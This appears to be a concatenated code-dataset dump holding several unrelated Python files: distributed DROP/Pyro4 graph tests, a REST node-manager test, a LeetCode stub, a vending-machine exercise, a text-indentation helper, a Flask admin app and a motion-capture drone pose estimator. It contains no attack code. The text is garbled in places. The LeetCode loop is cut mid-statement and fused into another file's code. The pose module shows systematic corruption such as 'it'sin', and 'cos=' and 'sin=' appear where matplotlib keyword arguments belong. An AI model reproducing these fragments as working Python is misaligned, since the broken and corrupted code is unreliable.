dm1.destroySession(sessionId)\n dm2.destroySession(sessionId)\n\n def test_runGraphSeveralDropsPerDM(self):\n \"\"\"\n A test that creates several DROPs in two different DMs and runs\n the graph. The graph looks like this\n\n DM #1 DM #2\n =================== ================\n | A --> C --> D --|----|-| |\n | | | |--> E --> F |\n | B --------------|----|-| |\n =================== ================\n\n :see: `self.test_runGraphSingleDOPerDOM`\n \"\"\"\n dm1 = NodeManager(useDLM=False)\n dm2 = NodeManager(useDLM=False)\n\n sessionId = 's1'\n g1 = [{\"oid\":\"A\", \"type\":\"plain\", \"storage\": \"memory\", \"consumers\":[\"C\"]},\n {\"oid\":\"B\", \"type\":\"plain\", \"storage\": \"memory\"},\n {\"oid\":\"C\", \"type\":\"app\", \"app\":\"dfms.apps.crc.CRCApp\"},\n {\"oid\":\"D\", \"type\":\"plain\", \"storage\": \"memory\", \"producers\": [\"C\"]}]\n g2 = [{\"oid\":\"E\", \"type\":\"app\", \"app\":\"test.test_drop.SumupContainerChecksum\"},\n {\"oid\":\"F\", \"type\":\"plain\", \"storage\": \"memory\", \"producers\":[\"E\"]}]\n\n uris1 = dm1.quickDeploy(sessionId, g1)\n uris2 = dm2.quickDeploy(sessionId, g2)\n self.assertEquals(4, len(uris1))\n self.assertEquals(2, len(uris2))\n\n # We externally wire the Proxy objects to establish the inter-DM\n # relationships\n a = Pyro4.Proxy(uris1['A'])\n b = Pyro4.Proxy(uris1['B'])\n c = Pyro4.Proxy(uris1['C'])\n d = Pyro4.Proxy(uris1['D'])\n e = Pyro4.Proxy(uris2['E'])\n f = Pyro4.Proxy(uris2['F'])\n for drop,uid in [(a,'A'),(b,'B'),(c,'C'),(d,'D'),(e,'E'),(f,'F')]:\n self.assertEquals(uid, drop.uid, \"Proxy is not the DROP we think should be (assumed: %s/ actual: %s)\" % (uid, drop.uid))\n e.addInput(d)\n e.addInput(b)\n\n # Run! The sole fact that this doesn't throw exceptions is already\n # a good proof that everything is working as expected\n with droputils.EvtConsumerProxyCtx(self, f, 5):\n a.write('a')\n a.setCompleted()\n b.write('a')\n b.setCompleted()\n\n for drop in a,b,c,d,e,f:\n self.assertEquals(DROPStates.COMPLETED, drop.status, \"DROP %s is not COMPLETED\" % (drop.uid))\n\n self.assertEquals(a.checksum, int(droputils.allDropContents(d)))\n self.assertEquals(b.checksum + d.checksum, int(droputils.allDropContents(f)))\n\n for dropProxy in a,b,c,d,e,f:\n dropProxy._pyroRelease()\n\n dm1.destroySession(sessionId)\n dm2.destroySession(sessionId)\n\n def test_runWithFourDMs(self):\n \"\"\"\n A test that creates several DROPs in two different DMs and runs\n the graph. The graph looks like this\n\n DM #2\n +--------------------------+\n | |--> C --| |\n +---|--> B --|--> D --|--> F --|--|\n | | |--> E --| | |\n DM #1 | +--------------------------+ | DM #4\n +-----+ | | +---------------------+\n | | | |--|--> L --| |\n | A --|--+ | |--> N --> O |\n | | | |--|--> M --| |\n +-----+ | DM #3 | +---------------------+\n | +--------------------------+ |\n | | |--> H --| | |\n +---|--> G --|--> I --|--> K --|--|\n | |--> J --| |\n +--------------------------+\n\n B, F, G, K and N are AppDOs; the rest are plain in-memory DROPs\n \"\"\"\n\n dm1 = NodeManager(useDLM=False)\n dm2 = NodeManager(useDLM=False)\n dm3 = NodeManager(useDLM=False)\n dm4 = NodeManager(useDLM=False)\n\n sessionId = 's1'\n g1 = [memory('A', expectedSize=1)]\n g2 = [sleepAndCopy('B', outputs=['C','D','E'], sleepTime=0),\n memory('C'),\n memory('D'),\n memory('E'),\n sleepAndCopy('F', inputs=['C','D','E'], sleepTime=0)]\n g3 = [sleepAndCopy('G', outputs=['H','I','J'], sleepTime=0),\n memory('H'),\n memory('I'),\n memory('J'),\n sleepAndCopy('K', inputs=['H','I','J'], sleepTime=0)]\n g4 = [memory('L'),\n memory('M'),\n sleepAndCopy('N', inputs=['L','M'], outputs=['O'], sleepTime=0),\n memory('O')]\n\n uris1 = dm1.quickDeploy(sessionId, g1)\n uris2 = dm2.quickDeploy(sessionId, g2)\n uris3 = dm3.quickDeploy(sessionId, g3)\n uris4 = dm4.quickDeploy(sessionId, g4)\n self.assertEquals(1, len(uris1))\n self.assertEquals(5, len(uris2))\n self.assertEquals(5, len(uris3))\n self.assertEquals(4, len(uris4))\n allUris = {}\n allUris.update(uris1)\n allUris.update(uris2)\n allUris.update(uris3)\n allUris.update(uris4)\n\n # We externally wire the Proxy objects to establish the inter-DM\n # relationships. Intra-DM relationships are already established\n proxies = {}\n for uid,uri in allUris.viewitems():\n proxies[uid] = Pyro4.Proxy(uri)\n\n a = proxies['A']\n b = proxies['B']\n f = proxies['F']\n g = proxies['G']\n k = proxies['K']\n l = proxies['L']\n m = proxies['M']\n o = proxies['O']\n\n a.addConsumer(b)\n a.addConsumer(g)\n f.addOutput(l)\n k.addOutput(m)\n\n # Run! This should trigger the full execution of the graph\n with droputils.EvtConsumerProxyCtx(self, o, 1):\n a.write('a')\n\n for dropProxy in proxies.viewvalues():\n self.assertEquals(DROPStates.COMPLETED, dropProxy.status, \"Status of '%s' is not COMPLETED: %d\" % (dropProxy.uid, dropProxy.status))\n dropProxy._pyroRelease()\n\n for dm in [dm1, dm2, dm3, dm4]:\n dm.destroySession(sessionId)\n\n def test_many_relationships(self):\n \"\"\"\n A test in which a drop is related to many other drops that live in a\n separate DM (and thus requires many Pyro connections).\n\n Drop A is accessed by many applications (B1, B2, .., BN), which should\n not exhaust resources on DM #1 (in particular, the pyro thread pool).\n We collapse all into C so we can monitor only its status to know that\n the execution is over.\n\n DM #1 DM #2\n ======= ====================\n | | | |--> B1 --| |\n | | | |--> B2 --| |\n | A --|----|-|--> B3 --|--> C |\n | | | |.........| |\n | | | |--> BN --| |\n ======= ====================\n \"\"\"\n dm1 = NodeManager(useDLM=False)\n dm2 = NodeManager(useDLM=False)\n\n sessionId = 's1'\n N = 100\n g1 = [{\"oid\":\"A\", \"type\":\"plain\", \"storage\": \"memory\"}]\n g2 = [{\"oid\":\"C\", \"type\":\"plain\", \"storage\": \"memory\"}]\n for i in xrange(N):\n b_oid = \"B%d\" % (i,)\n # SleepAndCopyApp effectively opens the input drop\n g2.append({\"oid\":b_oid, \"type\":\"app\", \"app\":\"test.graphsRepository.SleepAndCopyApp\", \"outputs\":[\"C\"], \"sleepTime\": 0})\n\n uris1 = dm1.quickDeploy(sessionId, g1)\n uris2 = dm2.quickDeploy(sessionId, g2)\n self.assertEquals(1, len(uris1))\n self.assertEquals(1+N, len(uris2))\n\n # We externally wire the Proxy objects to establish the inter-DM\n # relationships. Make sure we release the proxies\n with Pyro4.Proxy(uris1['A']) as a:\n for i in xrange(N):\n with Pyro4.Proxy(uris2['B%d' % (i,)]) as b:\n b.addInput(a, False)\n a.addConsumer(b, False)\n\n # Run! The sole fact that this doesn't throw exceptions is already\n # a good proof that everything is working as expected\n c = Pyro4.Proxy(uris2['C'])\n with droputils.EvtConsumerProxyCtx(self, c, 5):\n a.write('a')\n a.setCompleted()\n\n dm1.destroySession(sessionId)\n dm2.destroySession(sessionId)\n\nclass TestREST(unittest.TestCase):\n\n def test_fullRound(self):\n \"\"\"\n A test that exercises most of the REST interface exposed on top of the\n NodeManager\n \"\"\"\n\n sessionId = 'lala'\n restPort = 8888\n\n args = [sys.executable, '-m', 'dfms.manager.cmdline', 'dfmsNM', \\\n '--port', str(restPort), '-qqq']\n dmProcess = subprocess.Popen(args)\n\n with testutils.terminating(dmProcess, 10):\n\n # Wait until the REST server becomes alive\n self.assertTrue(utils.portIsOpen('localhost', restPort, 10), \"REST server didn't come up in time\")\n\n # The DM is still empty\n dmInfo = testutils.get(self, '', restPort)\n self.assertEquals(0, len(dmInfo['sessions']))\n\n # Create a session and check it exists\n testutils.post(self, '/sessions', restPort, '{\"sessionId\":\"%s\"}' % (sessionId))\n dmInfo = testutils.get(self, '', restPort)\n self.assertEquals(1, len(dmInfo['sessions']))\n self.assertEquals(sessionId, dmInfo['sessions'][0]['sessionId'])\n self.assertEquals(SessionStates.PRISTINE, dmInfo['sessions'][0]['status'])\n\n # Add this complex graph spec to the session\n # The UID of the two leaf nodes of this complex.js graph are T and S\n # PRO-242: use timestamps for final DROPs that get archived into the public NGAS\n graph = json.loads(pkg_resources.resource_string('test', 'graphs/complex.js')) # @UndefinedVariable\n suffix = '_' + str(int(time.time()))\n oidsToReplace = ('S','T')\n for dropSpec in graph:\n if dropSpec['oid'] in oidsToReplace:\n dropSpec['oid'] += suffix\n for rel in ('inputs','outputs'):\n if rel in dropSpec:\n for oid in dropSpec[rel][:]:\n if oid in oidsToReplace:\n dropSpec[rel].remove(oid)\n dropSpec[rel].append(oid + suffix)\n\n testutils.post(self, '/sessions/%s/graph/append' % (sessionId), restPort, json.dumps(graph))\n\n # We create two final archiving nodes, but this time from a template\n # available on the server-side\n timeout = 10\n testutils.post(self, '/templates/dfms.manager.repository.archiving_app/materialize?uid=archiving1&host=ngas.ddns.net&port=7777&sessionId=%s&connect_timeout=%f&timeout=%f' % (sessionId, timeout, timeout), restPort)\n testutils.post(self, '/templates/dfms.manager.repository.archiving_app/materialize?uid=archiving2&host=ngas.ddns.net&port=7777&sessionId=%s&connect_timeout=%f&timeout=%f' % (sessionId, timeout, timeout), restPort)\n\n # And link them to the leaf nodes of the complex graph\n testutils.post(self, '/sessions/%s/graph/link?rhOID=archiving1&lhOID=S%s&linkType=0' % (sessionId, suffix), restPort)\n testutils.post(self, '/sessions/%s/graph/link?rhOID=archiving2&lhOID=T%s&linkType=0' % (sessionId, suffix), restPort)\n\n # Now we deploy the graph...\n testutils.post(self, '/sessions/%s/deploy' % (sessionId), restPort, 'completed=SL_A,SL_B,SL_C,SL_D,SL_K', mimeType='application/x-www-form-urlencoded')\n\n # ...and write to all 5 root nodes that are listening in ports\n # starting at 1111\n msg = ''.join([random.SystemRandom().choice(string.ascii_letters + string.digits) for _ in xrange(10)])\n for i in xrange(5):\n self.assertTrue(utils.writeToRemotePort('localhost', 1111+i, msg, 2), \"Couldn't write data to localhost:%d\" % (1111+i))\n\n # Wait until the graph has finished its execution. We'll know\n # it finished by polling the status of the session\n while testutils.get(self, '/sessions/%s/status' % (sessionId), restPort) == SessionStates.RUNNING:\n time.sleep(0.2)\n\n self.assertEquals(SessionStates.FINISHED, testutils.get(self, '/sessions/%s/status' % (sessionId), restPort))\n testutils.delete(self, '/sessions/%s' % (sessionId), restPort)\n\n # We put an NGAS archiving at the end of the chain, let's check that the DROPs were copied over there\n # Since the graph consists on several SleepAndCopy apps, T should contain the message repeated\n # 9 times, and S should have it 4 times\n def checkReplica(dropId, copies):\n response = ngaslite.retrieve('ngas.ddns.net', dropId)\n buff = response.read()\n self.assertEquals(msg*copies, buff, \"%s's replica doesn't look correct\" % (dropId))\n checkReplica('T%s' % (suffix), 9)\n checkReplica('S%s' % (suffix), 4)","sub_path":"test/manager/test_dm.py","file_name":"test_dm.py","file_ext":"py","file_size_in_byte":17231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500053288","text":"## Problem1 (https://leetcode.com/problems/remove-duplicates-from-sorted-array-ii/)\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n if nums == [] or len(nums)==0:\n return []\n slow = 1\n fast = 1\n count = 1\n while fast 0 and ((price1 * 100) % 5) == 0:\n print(price1)\n print(\"Menu for deposits:\")\n print('\\'n\\' - deposit a nickel')\n print('\\'d\\' - deposit a dime')\n print('\\'q\\' - deposit a quarter')\n print('\\'o\\' - deposit a one dollar bill')\n print('\\'f\\' - deposit a five quarter bill')\n print('\\'c\\' - to cancel purchase')\n #dollar = round(price1//1)\n\n cents = round(price1*100)\n # cents\n dollar1 = 100\n nickel = 5\n quarter = 25\n dime = 10\n amountpaid = 0\n if True:\n amountpaid = 0\n while cents > 0:\n deposit = input(\"Indicate your deposit:\")\n if deposit == 'n':\n cents = cents - 5\n amountpaid = amountpaid + 5\n elif deposit == 'd':\n cents = cents - 10\n amountpaid = amountpaid + 10\n elif deposit == 'q':\n cents = cents - 25\n amountpaid = amountpaid + 25\n elif deposit == 'o':\n cents = cents - 100\n amountpaid = amountpaid + 100\n elif deposit == 'f':\n cents = cents - 500\n amountpaid = amountpaid + 500\n elif deposit == 'c':\n break\n dollar = cents // 100\n if dollar >0:\n print(\"Payment due\",dollar,'dollar',cents%100,'cents')\n else:\n print(\"Payment due\",cents%100,\"cents\")\n\n print('Please take your change below\\n',round(abs(cents)),\"cents\")\n continue\n else:\n print(\"Illegal price: Must be a non-negative multiple of 5 cents.\")\n\n\n","sub_path":"src/chapter5/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328080254","text":"#!/usr/bin/python3\n\"\"\"\n\"\"\"\n\n\ndef text_indentation(text):\n \"\"\"\n \"\"\"\n if not isinstance(text, str):\n raise TypeError('text must be a string')\n\n text_cpy = text[:]\n\n text_cpy = text_cpy.replace(\"?\", \"?<>\")\n text_cpy = text_cpy.replace(\":\", \":<>\")\n text_cpy = text_cpy.replace(\".\", \".<>\")\n\n text_split = text_cpy.split('<>')\n\n for i in range(len(text_split)):\n text_split[i] = text_split[i].strip()\n\n for i in range(len(text_split)):\n if i == len(text_split) - 1:\n print(\"{}\".format(text_split[i]), end='')\n else:\n print(\"{}\\n\".format(text_split[i]))\n","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387412261","text":"import os\nfrom flask import Flask, render_template, send_from_directory\nfrom flask_restful import Api\n\n# import all the models\nfrom modelos.usuario import *\nfrom modelos.departamento import *\nfrom modelos.reserva import *\nfrom modelos.contacto import *\nfrom modelos.actividad import *\nfrom modelos.foto import *\n\n# implamentacion\nfrom modelos.implementacion import *\napp = Flask(__name__)\napi = Api(app)\nurl = os.path.dirname(os.path.realpath(__file__))\nUPLOAD_FOLDER = url + \"/documentos\"\n\n# making default routes pages\n@app.route(\"/\")\ndef index():\n return render_template(\"web-index.html\")\n\n\n# making default routes pages\n@app.route(\"/404\")\ndef page404():\n return render_template(\"404.html\")\n\n\n# admin URL\n@app.route(\"/nv-login\")\ndef login():\n return render_template(\"admin/login.html\")\n\n\n@app.route(\"/admin-actividad\")\ndef actividad_registro():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = actividadImp.getvromView(cursor)\n\n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-actividad/registros.html\", datos=datos) \n except Exception as error:\n print(error.__str__())\n \n\n@app.route(\"/admin-actividad/registro\")\ndef actividad_form():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = reservaImp.getfromTable(cursor)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-actividad/formulario.html\", reservas=datos)\n except Exception as error:\n print(error.__str__())\n \n\n@app.route(\"/admin-dept\")\ndef dept_registro():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = departamentoImp.getfromTable(cursor)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-dept/registros.html\", departamentos = datos)\n except Exception as error:\n print(error.__str__())\n \n \n@app.route(\"/admin-dept/registro\")\ndef dept_form():\n return render_template(\"admin-dept/formulario.html\")\n\n\n@app.route(\"/admin-contacto\")\ndef contacto_registro():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = contactoImp.getfromView(cursor)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-contacto/registros.html\", contactos = datos)\n except Exception as error:\n print(error.__str__())\n\n\n@app.route(\"/admin-contacto/registro\")\ndef contacto_form():\n try:\n param = request.args.get(\"id\", None)\n\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = contactoImp.get_disponible(cursor, param)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-contacto/formulario.html\", reservas=datos)\n\n except Exception as error:\n print(error.__str__())\n\n\n@app.route(\"/admin-user\")\ndef usuario_registro():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = usuarioImp.getfromTable(cursor)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n\n return render_template(\"admin-usuario/registros.html\", usuarios= datos)\n except Exception as error:\n print(error.__str__())\n\n\n@app.route(\"/admin-user/registro\")\ndef usuario_form():\n try:\n return render_template(\"admin-usuario/formulario.html\")\n except Exception as error:\n print(error.__str__())\n\n\n@app.route(\"/admin-reserva\")\ndef reserva_registro():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = reservaImp.getfromTable(cursor)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n\n return render_template(\"admin-reserva/registros.html\", reservas=datos)\n except Exception as error:\n print(error.__str__())\n\n@app.route(\"/admin-reserva/registro\")\ndef reserva_form():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = departamentoImp.getfromTable(cursor)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-reserva/formulario.html\", departamentos = datos)\n except Exception as error:\n print(error.__str__())\n\n\n@app.route(\"/admin-foto\")\ndef foto_registro():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = fotoImp.getfromView(cursor)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-foto/registros.html\", fotos = datos)\n except Exception as error:\n print(error.__str__())\n\n\n@app.route(\"/admin-foto/registro\")\ndef foto_form():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = reservaImp.getfromTable(cursor)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-foto/formulario.html\", reservas = datos)\n except Exception as error:\n print(error.__str__())\n\n\n@app.route('/multimedia/')\ndef uploaded_file(filename):\n return send_from_directory(UPLOAD_FOLDER,filename)\n\n# erorres\n@app.errorhandler(404)\ndef notFound(e):\n return render_template(\"404.html\")\n\n\n# adding routes for the API\napi.add_resource(usuarios, '/nv-api/usuarios')\napi.add_resource(usuario, '/nv-api/usuarios/')\napi.add_resource(departamentos, '/nv-api/departamentos')\napi.add_resource(departamento, '/nv-api/departamentos/')\napi.add_resource(reservas, '/nv-api/reservas')\napi.add_resource(reserva, '/nv-api/reservas/')\napi.add_resource(contactos, '/nv-api/contactos')\napi.add_resource(contacto, '/nv-api/contactos/')\napi.add_resource(actividades, '/nv-api/actividades')\napi.add_resource(actividad, '/nv-api/actividades/')\napi.add_resource(fotos, '/nv-api/fotos')\napi.add_resource(foto, '/nv-api/fotos/')\n\n# setting port to our application\nif __name__ == '__main__':\n # Threaded option to enable multiple instances for multiple user access support\n app.run(threaded=True, port=5000)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"181989764","text":"import util\n\nfrom typing import Union, Iterable, List, Dict\n# Union[np.ndarray, Iterable, int, float]\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pickle\nimport prettytable\n\n\ndef main():\n \"\"\"\n This .py'sin goal is to extract drone pose (position + orientation) from MC (motion capture) data.\n \"\"\"\n # Path extraction of the MC data\n print('Processing data path.')\n f = util.DataFolder(data_folder_name='data_drone2')\n print()\n\n for vol_number in [0, 1, 2, 3, 4]:\n csv_path = f.get_unique_file_path(extension='.csv', specific_folder=f.folders['raw'][vol_number])\n # Extract poses of the drone from the motion capture measures\n print(f'Importing flight located in {csv_path}\\nCleaning raw data.')\n m = MCAnalysis(csv_path) # Importing and cleaning data\n data = m.get_data()\n print('Computing poses from Motion Capture measures.')\n poses = m.get_pose() # Extracting the pose from markers position\n print('Saving computed poses.')\n data.df['time'] = pd.Series([i / 120 for i in range(len(data))])\n data.df['pose'] = pd.Series(poses)\n pickle.dump(data.df, open(f.folders['raw_python'][vol_number] + 'mc_measure.pkl', 'wb')) # Saving\n print('\\n\\n')\n\n\nclass MCAnalysis(object):\n \"\"\"\n MCAnalysis regroup the methods to extract the pose from the motion capture data.\n \"\"\"\n\n def __init__(self, path: str):\n \"\"\"\n Load raw MC data. z is the vertical axis oriented from down to top.\n :param path: path of the .csv file of mc data.\n \"\"\"\n # Naming columns and removing headers\n self.columns = ['frame_id', 'sub_frame',\n 'b1_x', 'b1_y', 'b1_z',\n 'b2_x', 'b2_y', 'b2_z',\n 'b3_x', 'b3_y', 'b3_z',\n 'b4_x', 'b4_y', 'b4_z',\n 'y1_x', 'y1_y', 'y1_z',\n 'y2_x', 'y2_y', 'y2_z',\n 'x2_x', 'x2_y', 'x2_z',\n 'clapet_inf1_x', 'clapet_inf1_y', 'clapet_inf1_z',\n 'clapet_inf2_x', 'clapet_inf2_y', 'clapet_inf2_z',\n 'clapet_sup_2_x', 'clapet_sup_2_y', 'clapet_sup_2_z']\n self.points_name = ['b1', 'b2', 'b3', 'b4', 'y1', 'y2', 'x2']\n\n data_raw: pd.DataFrame = pd.read_csv(path, sep=';', header=0, names=self.columns)\n\n # Drop headers\n data_raw = data_raw.iloc[4:, :].reset_index(drop=True)\n\n # Casting types\n dtypes = {e: ('float64' if i > 1 else 'int64') for i, e in enumerate(self.columns)}\n data_raw = data_raw.astype(dtypes)\n\n # Frame id start at 0\n data_raw[['frame_id']] = data_raw[['frame_id']] - 1\n\n # Cutting non-usable data\n filename = path.split('/')[-1]\n to_cut = {'VolAvecPoubelle03.csv': 5000,\n 'VolAvecPoubelle04.csv': 4000}\n if filename in to_cut:\n data_raw.drop(list(data_raw.index)[to_cut[filename]:], inplace=True)\n\n # Nan drop of drone'sin markers\n point_column = []\n for point_name in self.points_name:\n point_column += [point_name + '_x', point_name + '_y', point_name + '_z']\n # Get the dataframe of drone'sin markers row that contains at list one nan\n tmp = data_raw[point_column].loc[(data_raw[point_column].isna().sum(axis=1) > 0), :]\n print(f'Found {len(tmp)} NaN in data at indexes : {[e for e in tmp.index]}.\\n'\n f'(last index of data is : {len(data_raw) - 1}).\\n'\n f'Proceeding by dropping them.')\n data_raw = data_raw.drop(index=tmp.index)\n\n # From mm to m\n for e in self.columns[2:]:\n data_raw[[e]] = data_raw[[e]] * 1e-3\n\n self.data = MCData(data=data_raw)\n self.drone_tf_o = np.zeros((4, 4)) # Will be defined in self.c_reference_frame\n\n def get_pose(self) -> List[util.Transformation]:\n \"\"\"\n Saves the computed poses from markers position expressed as a util.Transformation object such as\n pose = drone_tf_origin.\n \"\"\"\n\n poses = []\n\n # Compute Transformation between drone and motion capture reference frame for all data\n # Inspired by :\n # http://nghiaho.com/?page_id=671&fbclid=IwAR3ss4avz2OyZmGeQRe9ZhDFF5slMKDQa3LLaSGZttcggvzkCqBBjM7MKvA\n\n # Initialisation\n ai_mat = np.zeros((len(self.points_name), 3))\n\n # # Get ai'\n # ai_prime_mat = np.zeros((len(self.points_name), 3))\n # ai_prime = self.object_reference_frame(frame_number=0)\n # for i, point_name in enumerate(self.points_name):\n # ai_prime_mat[i, :] = ai_prime[point_name]\n # # Get ai' centroid\n # centroid_ai_prime = np.mean(ai_prime_mat, axis=0)\n\n # Get new ai' robust to noise\n print(' Compute ai prime')\n p = util.Progress(len(self.data))\n ai_prime_framed = np.zeros((len(self.data), len(self.points_name), 3))\n for frame_number in self.data.df.index:\n ai_prime_framed[frame_number, :, :] = np.array(list(self.object_reference_frame(frame_number).values()))\n p.update_pgr()\n ai_prime_mat = np.mean(ai_prime_framed, axis=0)\n centroid_ai_prime = np.mean(ai_prime_mat, axis=0)\n\n # # TITLE : ai_prime_new analysis\n # test = ai_prime_framed.reshape((len(self.data), len(self.points_name)*3))\n # fig, ax = plt.subplots(1, 1)\n # im = ax.imshow(np.corrcoef(test.T), cmap='plasma')\n # ax.set_title('Normalized COV(point)')\n # for funcs in [(ax.set_xticklabels, ax.set_xticks), (ax.set_yticklabels, ax.set_yticks)]:\n # funcs[0]([e for tmp in self.points_name for e in [tmp+'_x', tmp+'_y', tmp+'_z']], rotation=45)\n # funcs[1](range(len(self.points_name*3)))\n # fig.colorbar(im, ax=ax)\n # plt.show()\n\n # # Tab\n # mean = np.mean(test, axis=0)\n # std_dev = np.diag(np.cov(test.T))\n # res = (mean - std_dev) / mean\n # table = prettytable.PrettyTable(['Point Coordinate', '(Mean - std_dev) / Mean'])\n # for i, point_name in enumerate([e for tmp in self.points_name for e in [tmp+'_x', tmp+'_y', tmp+'_z']]):\n # table.add_row([point_name, res[i]])\n # print(table)\n print(' Compute poses')\n p = util.Progress(len(self.data))\n # Compute centroid for ai and then compute rotation matrix R and translation array T\n for index in self.data.df.index:\n # Get ai and their centroid\n for i, point_name in enumerate(self.points_name):\n ai_mat[i, :] = self.data.get_point(point_name, index)\n centroid_ai = np.mean(ai_mat, axis=0)\n\n # Compute rotation matrix\n h = (ai_mat - centroid_ai).T @ (ai_prime_mat - centroid_ai_prime)\n u, s, v = np.linalg.svd(h)\n drone_r_origin = v.T @ u.T\n if np.linalg.det(drone_r_origin) < 0:\n u, s, v = np.linalg.svd(drone_r_origin)\n v[2, :] = -1 * v[2, :]\n drone_r_origin = v.T @ u.T\n\n # Compute translation array\n drone_t_origin = centroid_ai_prime - drone_r_origin @ centroid_ai\n\n # Verification the result of the following calculus must be a matrix = 0\n # ai_prime_mat - ((drone_r_origin @ ai_mat.T).T + drone_t_origin)\n\n # Append drone_tf_origin\n drone_tf_origin = util.Transformation().from_rot_matrix_trans_vect(trans=drone_t_origin, rot=drone_r_origin)\n poses.append(drone_tf_origin)\n\n p.update_pgr()\n return poses\n\n def object_reference_frame(self, frame_number: int) -> Dict[str, np.ndarray]:\n \"\"\"\n Define the reference frame of the drone, C.\n\n :param frame_number: The number of the frame to define C.\n :return: All the measured points_name expressed in C.\n \"\"\"\n # Definition of C the reference frame of the drone.\n # First it'sin origin C through the computing of OC. With this definition it is almost the center of mass.\n oc = np.zeros(3)\n for i in range(4):\n oc += self.data.get_point(f'b{i + 1}', frame_number)\n oc = oc / 4\n\n # bi'sin plane equation\n bis_eq = util.plane_equation(self.data.get_point('b1', frame_number),\n self.data.get_point('b3', frame_number),\n self.data.get_point('b2', frame_number))\n plane_normal = bis_eq[0:3]\n # plane_normal must be oriented from bottom to top of the drone\n if (self.data.get_point('y1', frame_number) - oc) @ plane_normal < 0:\n bis_eq = - bis_eq\n plane_normal = bis_eq[0:3]\n\n # x axis definition\n b1 = self.data.get_point('b1', frame_number)\n y2 = self.data.get_point('y2', frame_number)\n y2proj = (y2 - b1) - ((y2 - b1) @ plane_normal) * plane_normal + b1\n x = (y2proj - oc) / np.linalg.norm(y2proj - oc)\n\n # z axis definition\n z = plane_normal / np.linalg.norm(plane_normal)\n\n # y axis definition in O\n y = np.cross(z, x) / np.linalg.norm(np.cross(z, x))\n\n # Compute ai'\n self.drone_tf_o = util.Transformation().from_trans_3_axis(trans=oc, x=x, y=y, z=z).inv()\n res = {}\n for point_name in self.points_name:\n res[point_name] = self.drone_tf_o @ self.data.get_point(point_name, frame_number)\n\n # # TITLE : Plotting ai and ai'\n # fig = plt.figure()\n # ax = fig.add_subplot(111, projection='3d')\n # for i, point_name in enumerate(self.points_name):\n # # R0\n # point = self.data.get_point(point_name, frame_number)\n # ax.scatter(xs=point[0], ys=point[1], zs=point[2], cos='tab:blue')\n # ax.text(x=point[0], y=point[1], z=point[2], sin=point_name)\n # # Drone\n # point = res[point_name]\n # ax.scatter(xs=point[0], ys=point[1], zs=point[2], cos='tab:orange')\n # ax.text(x=point[0], y=point[1], z=point[2], sin=point_name)\n # if i == 0:\n # ax.scatter(xs=point[0], ys=point[1], zs=point[2], cos='tab:blue', label='R0')\n # ax.scatter(xs=point[0], ys=point[1], zs=point[2], cos='tab:orange', label='Drone')\n #\n # # y2 projected\n # point = y2proj\n # point_name = 'y2proj'\n # ax.scatter(xs=point[0], ys=point[1], zs=point[2], cos='tab:green')\n # ax.text(x=point[0], y=point[1], z=point[2], sin=point_name)\n #\n # # C\n # point = oc\n # point_name = 'C'\n # ax.scatter(xs=point[0], ys=point[1], zs=point[2], cos='tab:green')\n # ax.text(x=point[0], y=point[1], z=point[2], sin=point_name)\n #\n # # Plane normal\n # ax.quiver(oc[0], oc[1], oc[2], plane_normal[0], plane_normal[1], plane_normal[2], length=0.1)\n # xx, yy = np.meshgrid(np.linspace(-0.15, 0.1, 100), np.linspace(0.3, 0.6, 100))\n # distortion_coefficient = bis_eq[3]\n # z = (-plane_normal[0] * xx - plane_normal[1] * yy - distortion_coefficient) / plane_normal[2]\n # ax.plot_surface(xx, yy, z, alpha=0.2)\n #\n # ax.view_init(azim=0, elev=90)\n # ax.legend()\n # plt.show()\n\n return res\n\n def get_data(self) -> 'MCData':\n \"\"\"\n :return: Cleans imported data.\n \"\"\"\n return self.data\n\n\nclass MCData(object):\n def __init__(self, data: pd.DataFrame):\n self.columns = ['frame_id', 'sub_frame',\n 'b1_x', 'b1_y', 'b1_z',\n 'b2_x', 'b2_y', 'b2_z',\n 'b3_x', 'b3_y', 'b3_z',\n 'b4_x', 'b4_y', 'b4_z',\n 'y1_x', 'y1_y', 'y1_z',\n 'y2_x', 'y2_y', 'y2_z',\n 'x2_x', 'x2_y', 'x2_z',\n 'clapet_inf1_x', 